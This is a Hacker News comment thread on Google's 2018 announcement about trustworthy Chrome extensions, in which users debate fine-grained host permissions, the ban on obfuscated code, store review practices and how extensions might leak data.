
Trustworthy Chrome Extensions, by default - seanwilson
https://blog.chromium.org/2018/10/trustworthy-chrome-extensions-by-default.html
======
yonran
Chrome’s auto-update forces you to trust the author of any extension you
install for as long as you use the extension. Google’s “Trustworthy by
default” effort doesn’t change this model since it still provides no
guarantees. This works for some extensions backed by companies (e.g. Adblock),
but it doesn’t work for extensions that add simple functionality.

For small extensions that add basic browser functionality (e.g. reorder tabs,
enable autocomplete), I wish Google would enable users to verify open-source
extensions. I trust the version of the code that I have reviewed on github. I
do not trust that the kid who wrote this extension won’t go rogue and upload a
malicious version in a future autoupdated release. So the only way I can
verify the code that I run is to install it from the Chrome Web Store, copy
the code and verify it, uninstall the Chrome Web Store version, and then load
the unpacked extension (or even publish my own copy of it to the Chrome Web
Store). This is pretty cumbersome.

~~~
notatoad
Chrome's auto-update forces you to trust the author of an extension _until it
requests more permissions_ , at which point the extension is automatically
disabled and the user is prompted to accept the new permissions to re-enable
the extension.

Making the permissions as fine-grained as possible - as google is doing here -
is a good way to prevent an extension from becoming malicious in the future.

~~~
stouset
Doesn’t this simply encourage extension authors to request as many permissions
as possible from the outset?

Most users just click yes to all of these things. Those who would skip
installing an extension because of this are an extreme minority.

~~~
danShumway
The solution to that is to only request extensions when they're needed, and to
give users prominent options to grant access "only once" or to revoke access
(both of which should be undetectable from extensions without extra work).

This isn't perfect, but it comes with some advantages. It's more work for an
extension author to check for the permissions than to just write their
application logic normally. This means that the lazy authors start coding
their apps correctly (just try to do the thing and let the OS handle asking
for permission), and only the malicious authors are left nagging for
permissions early.

If you have more legitimate than malicious app on your platform, you can at
least sort of train some users to think what the malicious apps are doing is
weird. If _most_ of your apps don't ask for permissions up front, then the
ones who do start to look weirder.

If I go to a website, and a permission pops up asking to access my webcam, and
I didn't do something to make that permission pop up... that is really weird
and I'm going to click 'no'. And when I click no, if the website wants to be
cranky about it, they have to write _extra_ code to hide whatever content is
already loaded and pop up a dialog complaining. If I click OK and then
immediately click a button and revoke that permission, they need to have even
more code continually running in the background to detect it.

Again, it's not hard for a malicious extension/app to do that, it's just that
_only_ the malicious extensions/apps are going to do that. So it becomes
easier to educate users with simple rules like, "if a site asks for a
permission that's unrelated to what you're doing, _always_ say no." It also
becomes easier for users who are already careful about permissions to be
paranoid and grant them carefully, because they don't have to decide up-front
whether the app is worth installing -- they can decide later on whether or not
they trust it to have access to something.

Part of having fine-grained permissions is in getting rid of what I call the
Terms of Service version, where you just stick anything you might ever want
inside of a manifest and then users either accept everything or the app
doesn't install.

~~~
seanwilson
> Again, it's not hard for a malicious extension/app to do that, it's just
> that only the malicious extensions/apps are going to do that. So it becomes
> easier to educate users with simple rules like, "if a site asks for a
> permission that's unrelated to what you're doing, always say no."

Are you sure it's this simple? Adblockers and password managers for example
require wide ranging permissions to work and there's plenty of popular
extensions in the same situation.

~~~
Ajedi32
Password managers don't need extensive permissions, they just need a built-in
autofill API. Similarly, you could implement a basic adblocker via a
declarative content blocking API.

Fine-grained permissions will allow for this sort of thing.

~~~
seanwilson
Does that cover the functionality of most popular extensions though? When
there's an API that matches up with the purpose of the extension, it's more
straightforward. I would have thought the popularity of those particular
example extensions is what partially drove the creation of those APIs as well.

~~~
Ajedi32
The APIs I mentioned in my previous comment don't exist yet. My point is that
Google is going to need to _build_ APIs to fulfill all of the most common use
cases (including those ones) in order to succeed in their goal of making
extension permissions more fine-grained.

So yes, the functionality of most popular extensions will be covered by the
new APIs, because Google will designing the new APIs with those popular
extensions in mind.

------
nickysielicki
Now that modern operating systems come bundled with antivirus and complicated
kernel security techniques and most-of-all, because the Web is winning and
most of our computer interaction is through a web browser, browser extensions
are a prime place for malware to enter someone's PC. Both Mozilla and Google
have not given it enough attention. It's good to see this taking place. I can
understand the concerns about walled gardens and so on, but I think that's
just a pill that you have to swallow. If you want to use a self-loaded
extension, that's still available and you'll always be able to find a chromium
build that does that if it's very important to you. For most people, it's not
a big concern.

All that being said, there's still so much that Chrome needs to fix when it
comes to extensions. Extension updates are done in a very opaque way.
Extensions that alter network requests have precedence based on their install
order --- and there's no clean way for two extensions to really coordinate
between each other. This means that HTTPS Everywhere and Decentraleyes and
uBlock conflict with one another, _and the solution might be to uninstall and
reinstall them in a different order_. That is clearly insanity. What happens
when you login to Chrome on a new machine and your extensions are pulled in,
is the install order guaranteed to match your previous machine?

There's also no centralized storage for extensions, which means that settings
are generally going to be completely different between machines unless the
extension implements its own syncing/backup code.

There's also no way to disable an extension on one machine without disabling
it on another machine. That means that if you want an app on your Chromebook,
it's gotta be on your desktop as well.

It's frustrating to use extensions on Chrome.

~~~
lousken
> browser extensions are a prime place for malware to enter someone's PC. Both
> Mozilla and Google have not given it enough attention.

Well Firefox has switched to webextensions for security reasons and they
received a lot of flak because of it. So I'd say the opposite, since Mozilla
pushed this hard and still working on better support.

> there's no clean way for two extensions to really coordinate between each
> other

I don't think something like this should be allowed, could be abused. Instead
browsers should embrace the fact that they've become operating systems inside
operating systems and implement some of the most used extensions natively.

I completely agree about extensions setting sync tho, it's major pita across
all browsers not just chrome.

------
Ajedi32
This is great. Extensions have long been a weak point in the web security
model, since many extensions currently require what is essentially the web
equivalent of root privileges (UXSS) in order to function. It's good to see
Google finally doing something to try to remedy this.

~~~
seanwilson
I'm not sure how much this will help to be honest. I haven't looked into the
stats for this, but a huge number of popular and useful extensions require
access to reading/writing data to all domains to function so users just get
used to this being a standard permission they have to allow.

One tip I suggest though: Create one locked down profile in Chrome that you
use for email, banking etc. and a separate profile that you can be less
careful about installing extension in. Extensions in the second profile won't
have access to your browsing activity in the first profile. I have a profile I
use for web development for example which I install lots of extensions to that
require access to everything.

~~~
Ajedi32
The new user controls are just a temporary stopgap measure. The real solution
Google is working towards is Manifest v3, which will be designed as a much
better system with fine-grained permissions.

If Google follows the model with Chrome that they did Android, UXSS
permissions will eventually be phased out over time and replaced with better,
more secure, opt-in, purpose-built APIs in Chrome. (Assuming they can do that
without sacrificing _too_ much functionality.)

~~~
andrenotgiant
Almost nobody makes well thought out decisions when agreeing to permissions
during the extension install process.

EULAs, Terms of Service, Mobile Apps, Cookie Consents have boy-who-cried-
wolf'ed everyone except the most paranoid and tech-savvy to the point that
they are mostly ignored.

~~~
danShumway
Stop taking away people's locks just because other people don't use them.

Yes, many non-technical users do not pay attention to permissions. But
permissions are extremely helpful to people who do use them -- and the number
of people who do use them is larger than the number of people who audit source
code or set up VMs.

Educating normal users to pay attention to permissions is a problem. It is a
separate problem than, "do they even have tools in the first place if they
want to use them." The problem I want solved is how _I_ verify that an
extension is safe. Granular extension permissions solves that problem for
people like me.

After that problem is solved, then I can worry about educating my friends and
family.

------
seanwilson
"Starting today, Chrome Web Store will no longer allow extensions with
obfuscated code...Ordinary minification, on the other hand, typically speeds
up code execution as it reduces code size, and is much more straightforward to
review. Thus, minification will still be allowed"

I have a Chrome extension that uses Webpack to convert TypeScript to
JavaScript which then uses UglifyJS to minify it. If I submit only the
minified code, is this compliant?

~~~
albertgoeswoof
On Firefox the reviewer took my source code, inc package.json, and ran it
through the exact same version of my dependencies and then did a checksum of
the output against what I submitted. The reviewer also read my source code and
reviewed all dependencies.

It was a pain to get through but doing good things for your users takes
effort.

~~~
seanwilson
Is it correct that Firefox makes your extension live in a short time after you
upload it as long as you pass some automated checks? But it can get taken down
if it fails the review performed by a human later?

~~~
dessant
That is correct. Opera Add-ons remains the last of the larger extension stores
that requires a review before a version gets published.

------
dsissitka
> User controls for host permissions

That is really nice.

One of the reasons Firefox is a non-starter for me is because sometimes
there's no good way to tell what hosts an extension requires access to:

[https://imgur.com/a/k4rk0](https://imgur.com/a/k4rk0)

------
jchw
This seems like a great effort. However, I worry what this means for the
future of WebAssembly inside of extensions. There's an undeniable advantage to
being able to write extensions in languages other than JavaScript. AgileBits
has been writing the 1Password X extension, in Go, compiled to JS. While the
JS isn't obfuscated per-se, it's also not very readable.

I hope they can find a path forward that doesn't kill off extensions like
1Password X.

------
skrebbel
I think some more granularity in permissions wrt how extensions may change
websites would be useful too.

For example, it would be easy for Google/Mozilla/etc to compile a list of HTML
tags and attributes that can never be used to inject javascript. Lots of "HTML
sanitization" libraries do this, for instance. Then, we could get permissions
like "remove content", "inject non-interactive content" and "inject
interactive content". An ad blocker, for instance, should work with no network
access whatsoever and should never need to inject code. So I can totally lock
it down to not being able to do anything except replace ads by empty <div>
tags.

I think there's an opportunity for browser builders here with more granular
permissions in other areas too (eg "network access but only to domains x and
y", which ofc only makes sense if you can't also inject arbitrary interactive
content but ok). No user is of course ever going to read those, or understand
which combination of permissions make sense, but a Google reviewer can. Then
the reviewer doesn't need to review anymore whether the code does something
bad, but only whether the requested permissions would _allow_ the code to do
something bad an whether the permissions make sense for what the extension is
supposed to be doing.

Eg LastPass ought to work just fine with only "access to *.lastpass.com" plus
"inject only non-interactive content".

This could be particularly powerful if browser designers would create a way
for extensions to show possibly-interactive content on the
top/left/side/bottom of the page (in a popover bar for instance) that is
clearly not part of the page DOM. Then, LastPass can remove their "click to
auto-fill" icons inside user/pass forms and replace them by a "That looks like
a login form. Do you want to auto-login?" popover bar with an ok button. The
UX is still great, security is greatly improved.

I don't pretend to be smarter than the teams that build browsers, so I may be
missing something. Nevertheless right now I think that this, combined with the
feature announced in this post where extensions can be locked down to specific
websites, will remove the need for nearly any "can change anything on any
website and do anything with it" extensions (which are pretty much the norm
right now). Gmail extension? Website-specific. Pinterest "pin it" button? Non-
interactive (make the injected button just be a selector and show the final
"pin selected images" action in a popover bar). HN-Submit? Non-interactive.
And so on.

~~~
X-Cubed
A lot of that functionality is already possible through Declarative Content[1]
and Optional Permissions[2]. These remove the need for extensions to have
permissions to all websites, while enabling them to be given permission to a
site after installation. However, these features weren't part of the original
APIs, so I think a lot of extension developers aren't familiar with them,
don't want to refactor their existing codebases to support these features, or
are targeting multiple browsers where other browsers don't support this
functionality.

1\.
[https://developer.chrome.com/extensions/declarativeContent](https://developer.chrome.com/extensions/declarativeContent)
2\.
[https://developer.chrome.com/apps/permissions](https://developer.chrome.com/apps/permissions)

------
skybrian
Overall this looks great, but I wonder whether extensions will be allowed that
are written in compiled languages? Dart, Go (via Gopher), Kotlin, and so on?
Is Webassembly supported?

~~~
coolspot
Both Chrome and Firefox support WebAssembly in extensions.

So technically you can write whole extension in WebAssebly with thin wrapper
written in js.

Although "Starting today, Chrome Web Store will no longer allow extensions
with obfuscated code." which might be an issue.

------
seanwilson
So by default Chrome extensions will still be able to access any domain
they've asked for permission to in their manifest (which can include all
domains) but users can optional restrict this? Is this really going to help
non-technical users much?

~~~
Ajedi32
Not at first. The real benefit to non-technical users will come once Google
starts using this system to pressure extension developers to migrate to newer
APIs with more limited permissions.

Right now, as you say, only power users will use this feature. But once
suitable alternative permissions are available for the more common use cases,
Google will start to transition to "When you click the extension" as the
default setting, which will put pressure on affected extension developers to
migrate to the new permissions systems to avoid unnecessary friction for their
users.

------
akerl_
"This includes code within the extension package as well as any external code
or resource fetched from the web."

How does this effect Greasemonkey-style extensions where the user imports JS
to run on pages?

------
sbr464
Any updates like these are appreciated since I've all but stopped using
extensions, and would like starting using them again one day. I don't think
the current system with messages in the UI like "read/change all data on all
sites you visit" is acceptable in the current 2018 environment. I feel like a
default-deny-all policy and a (user friendly) way to review what data/urls an
extension is accessing is needed. There currently is too much trust involved,
and it seems like it shouldn't be needed. One idea is for chrome to provide
the extension with a sandboxed, virtual dom api that doesn't pass any user
identifiable data. The extension registers with chrome the functionality it
provides, like "fill the main password field with this string", and chrome
executes that action internally. It can never request user/history/etc data,
just provide functionality to a black box.

------
user812
Can someone explain to me why it isn't possible to simply give users the
option to influence whether an extension can make a request to a remote
server?

This way one could simply disallow extensions to do anything that isn't
happeninging locally.

~~~
rictic
It's trickier than it seems. To take just one example, suppose you have an
extension that modifies pages to insert a related link (e.g. an extension that
tries to infer a hacker news user's reddit account and link to it from their
HN profile page).

The extension needs permission to modify documents on the hacker news domain.
But if it can insert an <a> tag, what's to stop it from inserting an invisible
<img href> tag, which could be used to exfiltrate data? Or even just inserting
an <a> tag with an onClick handler, or a javascript: url?

~~~
andrenotgiant
Right - or even trickier... Imagine Google manages to block extensions from
inserting <img> tags that reference other domains as a way of exfiltrating
data... There are so many other ways to do it:

Say you have an extension that ONLY wants access to mail.google.com. It might
feel safer because it can't load in any third party scripts. But it can just
as easily SEND data from your account as an email which it promptly deletes.

Same goes for LinkedIn, Facebook, HN, any interactive website can be used to
exfiltrate data.

------
jamieweb
One thing that I'd like to see is mandatory code signing, so that even in the
event of a compromised developer account it's not possible for an update to be
pushed out unless the attacker also has the signing key.

------
felipelemos
What is the implication to ad blockers as a whole?

~~~
throwawaymath
Ad blockers will continue to function as they currently do. However, users may
need to explicitly allow the ad blockers whitelisted access to all hosts if
this feature is implemented with default-deny.

~~~
danShumway
Which is entirely reasonable IMO.

They _should_ implement default-deny. It'll take two seconds for users to
grant the permission, and the vast majority of extensions don't need it.

------
lvh
I would like to know more about the review methodology and when the review is
triggered. If I ask for wide permissions, get them, and then sell my extension
to a malicious third party, what triggers the review?

------
actionowl
I like the host access restriction policy they describe. I update and fix
existing extensions for customers and about 90% of the time the previous
author has added necessary permissions and access to URLs.

------
pjmlp
The best way is not to use any extensions to start with.

~~~
Jyaif
If you care about security, don't use a browser.

~~~
pjmlp
Actually I vote that browsers should have stuck with Web 1.0, for plain
documents.

I still do most of my web development with server side rendering stacks.

------
kevingadd
For context, I have an extension designed for a single html5 game, with
roughly ~80k weekly active users. I've been using the chrome web store to
deploy and update it for about 2 years, and recently wrote my own installer
after Google stopped me from issuing security updates for over a month. I also
had to build my own configuration update system to enable me to disable
features on an hour's notice due to the security update incident & Chrome
taking over a day to install updates - I'm serving about 3GB of configuration
and update data per day right now, at around 1kb/user/hr.

Lots of functionality (and thus current extensions) requires requesting
blanket access to all websites so they have a big task ahead of them trying to
get all those extensions to comply.

In general the way things work for Chrome Extensions right now is bad for
users and downright hostile to developers. Because I actually followed best
practices on extension permissions I got a lot of confused, paranoid users,
and had to explain Google's awful permissions model and UI in detail:
[https://www.reddit.com/r/Granblue_en/comments/86bdmo/psa_vir...](https://www.reddit.com/r/Granblue_en/comments/86bdmo/psa_viramate_is_back_on_chromestore/)
If I had simply requested a large set of blanket permissions when I first
created the extension, I would've saved myself a huge amount of effort.

Users having the choice to scope wildcards down to specific pages is _a start_
but until it's a default it isn't really a meaningful improvement for anyone
because few people are qualified to actually set those restrictions properly.
The design of the extension API itself tends to require wildcards to provide
functionality due to limitations in the other APIs. For example, if you want
to do anything fancy with web requests and do it performantly, you may need to
inject JS directly into webpages - the background-page-based webRequest API is
slow and missing key features.

There's also a risk here that by trying to kludge better access controls into
the existing full-of-holes extension model, Google is going to break tons of
extensions that ordinary users rely on and they're going to be too frustrated
by this to be happy about any security upside.

Some genuinely good changes though:

* Requiring 2FA to deploy extension updates. This is a big vulnerability in the existing system, especially if an extension has many users. It's been exploited in the past.

* Service worker support (probably) - the current model with page/content/background scripts and popup pages is a nightmare both to author and debug, hopefully service workers will provide a better way to architect all of this.

* Narrowly scoped declarative APIs - hopefully this means extension developers can finally get access to smaller features without having to request access to the entire universe. Some of the feature scoping is really absurd and occasionally unrelated APIs are tucked under a larger permission in a way that really confuses users. As I explained to users in my old reddit comment above, Google currently uses "Access your browsing history" to describe an ENORMOUS set of unrelated features.

* Blocking obfuscated JS - this literally will do nothing to protect users, but it's worth denying it anyway. There's no good reason to obfuscate extension JS since it's so hard to debug extensions you didn't write anyway. It's possible this will make it easier for them to apply machine learning to identify malicious extension code, at least, but I bet the machine learning will just randomly reject updates to legitimate extensions without any explanation and you'll be screwed.

The big wildcard here is Google's history of failing to maintain or properly
document extension APIs. They're going to be rearranging lots of existing
stuff and adding new stuff, so the underlying mess will probably become 10x
worse. Core APIs like notifications have been entirely or partially broken for
years with no effort made to fix them or update docs. Inertia is one of the
main things carrying the chrome extension ecosystem forward and it's possible
many extension developers will churn out after they find the migration effort
involved here too much, similar to how Firefox lost many extensions during
their two transitions (old->multiprocess compatible->webextensions)

------
keyle
I'm certainly starting to trust the extensions more than the core browser
these days...

------
albertgoeswoof
Reposting this comment as I think it’s relevant at the top level.

On Firefox the reviewer took my source code, inc package.json, and ran it
through the exact same version of my dependencies and then did a checksum of
the output against what I submitted. The reviewer also read my source code and
reviewed all dependencies.

It was a pain to get through but doing good things for your users takes
effort.

